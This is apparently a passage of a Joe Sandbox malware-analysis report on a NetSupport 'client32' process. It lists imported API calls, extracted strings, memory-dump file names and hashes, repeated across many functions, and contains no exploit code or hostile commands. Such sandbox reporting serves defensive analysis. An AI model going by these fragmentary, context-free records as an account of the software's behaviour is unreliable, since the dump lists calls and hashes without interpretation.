                                                                                                                          • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
                                                                                                                          • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
                                                                                                                          • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
                                                                                                                          • Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
                                                                                                                        • GetTickCount.KERNEL32 ref: 11057293
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CountTick$LibraryLoad__wcstoi64
                                                                                                                        • String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
                                                                                                                        • API String ID: 1442689885-2337161965
                                                                                                                        • Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                        • Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
                                                                                                                        • Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
                                                                                                                        • Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 685A5E36
                                                                                                                          • Part of subcall function 685A33A0: wsprintfA.USER32 ref: 685A34FD
                                                                                                                          • Part of subcall function 685A7D00: __vswprintf.LIBCMT ref: 685A7D26
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __vswprintf_memsetwsprintf
                                                                                                                        • String ID: 0x0x0x0$226546$>???.???.???.???$CLIENT_NAME=%s$CMD=CLIENT_PIN_REQUEST$CMD=CONTROL_PIN_REQUEST$PINserver
                                                                                                                        • API String ID: 518437271-2390828419
                                                                                                                        • Opcode ID: c08184576ff0594fb756a8d6428282d34dbe2dd95cf6d13f9cafde797af372fa
                                                                                                                        • Instruction ID: f435b78c6af9bacf1239b75f10be07d28a54f5489d6bb42726ba41e9fd131857
                                                                                                                        • Opcode Fuzzy Hash: c08184576ff0594fb756a8d6428282d34dbe2dd95cf6d13f9cafde797af372fa
                                                                                                                        • Instruction Fuzzy Hash: 54715875C40258EEDB20DB68CC90FEDB7B9EB44214F8086E9E519B7180E7315E85CF65
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 685ACE20
                                                                                                                          • Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B1928
                                                                                                                          • Part of subcall function 685B1913: __CxxThrowException@8.LIBCMT ref: 685B193D
                                                                                                                          • Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B194E
                                                                                                                        • _memmove.LIBCMT ref: 685ACEA7
                                                                                                                        • _memmove.LIBCMT ref: 685ACECB
                                                                                                                        • _memmove.LIBCMT ref: 685ACF05
                                                                                                                        • _memmove.LIBCMT ref: 685ACF21
                                                                                                                        • std::exception::exception.LIBCMT ref: 685ACF6B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 685ACF80
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                        • String ID: deque<T> too long
                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                        • Opcode ID: fec3d98fae86e9cfe92e3861efac64ac5190c1e9e7bdaaa51ed1b3252e48068e
                                                                                                                        • Instruction ID: 080d0a4009334ba8dc14d8fc1d2dcfedfee5e2f09b38f29e0c302ea86ba7d685
                                                                                                                        • Opcode Fuzzy Hash: fec3d98fae86e9cfe92e3861efac64ac5190c1e9e7bdaaa51ed1b3252e48068e
                                                                                                                        • Instruction Fuzzy Hash: 2D4194B2E00104ABDB14CE68CCD1AAEB7F9AFD4214F998669DC19D7344EB34EE018790
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110CF2A0
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                          • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                        • _memmove.LIBCMT ref: 110CF327
                                                                                                                        • _memmove.LIBCMT ref: 110CF34B
                                                                                                                        • _memmove.LIBCMT ref: 110CF385
                                                                                                                        • _memmove.LIBCMT ref: 110CF3A1
                                                                                                                        • std::exception::exception.LIBCMT ref: 110CF3EB
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 110CF400
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                        • String ID: deque<T> too long
                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                        • Opcode ID: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
                                                                                                                        • Instruction ID: 3f2339a9076695d70661dcab859014021b6c0d6f22495f28215c516d49704129
                                                                                                                        • Opcode Fuzzy Hash: ca0d9d9c1b3117fae71b95f011d40ae9033231cd0910b8171d4419a53fd285b4
                                                                                                                        • Instruction Fuzzy Hash: 6541E876E00115ABDB04CE68CC81BAEF7F6EF80614F19C6A9DC15D7344EA34EA418B91
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 68593EB0
                                                                                                                          • Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B1928
                                                                                                                          • Part of subcall function 685B1913: __CxxThrowException@8.LIBCMT ref: 685B193D
                                                                                                                          • Part of subcall function 685B1913: std::exception::exception.LIBCMT ref: 685B194E
                                                                                                                        • _memmove.LIBCMT ref: 68593F39
                                                                                                                        • _memmove.LIBCMT ref: 68593F5D
                                                                                                                        • _memmove.LIBCMT ref: 68593F97
                                                                                                                        • _memmove.LIBCMT ref: 68593FB3
                                                                                                                        • std::exception::exception.LIBCMT ref: 68593FFD
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68594012
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                        • String ID: deque<T> too long
                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                        • Opcode ID: 11eb3b7e1b40678d30a6178467c09a66cc5a929578326e91b88e1ec3bacf282b
                                                                                                                        • Instruction ID: 78146cfc075f1b48c8fec3ca5ed38b3b678857dfb0320e8016d947741336f648
                                                                                                                        • Opcode Fuzzy Hash: 11eb3b7e1b40678d30a6178467c09a66cc5a929578326e91b88e1ec3bacf282b
                                                                                                                        • Instruction Fuzzy Hash: 66418472E00204DBDF14CE68CC91AEEB7FAEBD4214B598669EC19D7344E635EE418790
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11125060
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                          • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                        • _memmove.LIBCMT ref: 111250EA
                                                                                                                        • _memmove.LIBCMT ref: 1112510E
                                                                                                                        • _memmove.LIBCMT ref: 11125148
                                                                                                                        • _memmove.LIBCMT ref: 11125164
                                                                                                                        • std::exception::exception.LIBCMT ref: 111251AE
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 111251C3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                        • String ID: deque<T> too long
                                                                                                                        • API String ID: 827257264-309773918
                                                                                                                        • Opcode ID: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
                                                                                                                        • Instruction ID: 0f323eff97a08ef0bfb1d310de9271f6685152ce05bf58ee348bace92ff13d14
                                                                                                                        • Opcode Fuzzy Hash: a4ca0833f89cb949e8c6ff4a971e5aaf4e212e7777e7c70b2ce6ff60b8d225c5
                                                                                                                        • Instruction Fuzzy Hash: 0541E776E00115ABDB54CE68CCC1AEEF7E5EF84214F69C668D81AD7344EA34EA41CBD0
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 68597F26
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 68597FF9
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 68598047
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 68598052
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898,?,?,a3Zh,?), ref: 6859806A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeave$_memset
                                                                                                                        • String ID: RESULT$a3Zh$b
                                                                                                                        • API String ID: 920729587-926050548
                                                                                                                        • Opcode ID: aa468f9bd3f7d3300ee23661afa10fbea0540181922cf68e47308bcde5dafe8d
                                                                                                                        • Instruction ID: 9ff1e417ae1b924cc4d1e8758e7498bd2614de29c40dd83531f9ec38e2734d9f
                                                                                                                        • Opcode Fuzzy Hash: aa468f9bd3f7d3300ee23661afa10fbea0540181922cf68e47308bcde5dafe8d
                                                                                                                        • Instruction Fuzzy Hash: 454170B5D40209EEEF10DFA48C45BEEB7B5EF05344F80406ADC59E6241E7355A848BAA
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 110051CE
                                                                                                                        • _memset.LIBCMT ref: 110051F0
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 11005204
                                                                                                                        • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005261
                                                                                                                        • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005277
                                                                                                                        • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005298
                                                                                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 2755257978-4108050209
                                                                                                                        • Opcode ID: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                        • Instruction ID: 151c37117e6a4efcf468b3f2afefe3ee8c103672a57a50470b6f5af14a9aa5dd
                                                                                                                        • Opcode Fuzzy Hash: 30e732c661686793a5b6a227507d1879ad683f9c8e26dd4348ab49c0c8fb9c12
                                                                                                                        • Instruction Fuzzy Hash: A031A370D0121ABBEB01DFA4D889BEEBBFCEF46358F008159F951E6240E7759A44CB51
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(?,?), ref: 68595F77
                                                                                                                        • wsprintfA.USER32 ref: 68595FB2
                                                                                                                        • MessageBoxA.USER32(00000000,?,NetSupport,00000004), ref: 68595FC7
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 68595FFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSleepVersionwsprintf
                                                                                                                        • String ID: *LineSpeed$Limit transmission speed to %d bps?$NetSupport$_Debug
                                                                                                                        • API String ID: 1064562911-2508291834
                                                                                                                        • Opcode ID: 3f4b9032d3b7198f967fe48cb3c806fb71422f00c4d357b43de2078ee20fe49a
                                                                                                                        • Instruction ID: 7590790b7016814d3ec6a94e6fba65f781876d7c511816c83a1320df344e4193
                                                                                                                        • Opcode Fuzzy Hash: 3f4b9032d3b7198f967fe48cb3c806fb71422f00c4d357b43de2078ee20fe49a
                                                                                                                        • Instruction Fuzzy Hash: 3B21E771D40114DBDF00DFA4CD59BDD77B4EB45314F9101AAED0AA7280E7309D44CB98
                                                                                                                        APIs
                                                                                                                        • UnDecorator::UScore.LIBCMT ref: 685C9FD1
                                                                                                                        • DName::DName.LIBCMT ref: 685C9FDD
                                                                                                                          • Part of subcall function 685C7CA8: DName::doPchar.LIBCMT ref: 685C7CD9
                                                                                                                        • UnDecorator::getScopedName.LIBCMT ref: 685CA01C
                                                                                                                        • DName::operator+=.LIBCMT ref: 685CA026
                                                                                                                        • DName::operator+=.LIBCMT ref: 685CA035
                                                                                                                        • DName::operator+=.LIBCMT ref: 685CA041
                                                                                                                        • DName::operator+=.LIBCMT ref: 685CA04E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                        • String ID: void
                                                                                                                        • API String ID: 1480779885-3531332078
                                                                                                                        • Opcode ID: ca7b4fa82fc53332c7682243c5238c7ed70021def7a3aaa2e8da33fe7a24c256
                                                                                                                        • Instruction ID: c16303cf2886aca8b78981510544644856b5eb5ed46390a29cfcfe86fc549867
                                                                                                                        • Opcode Fuzzy Hash: ca7b4fa82fc53332c7682243c5238c7ed70021def7a3aaa2e8da33fe7a24c256
                                                                                                                        • Instruction Fuzzy Hash: 0D115EB5900204AFDB06DBA8C859AED7FB4EB41344F85409DD412AB2A1EB709E45CF56
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 1114F203
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1114F219
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F2FF
                                                                                                                        • CreateDIBSection.GDI32(00000000,00000028,00000000,?,00000000,00000000), ref: 1114F327
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 1114F33B
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 1114F361
                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 1114F371
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 1114F378
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 1114F387
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
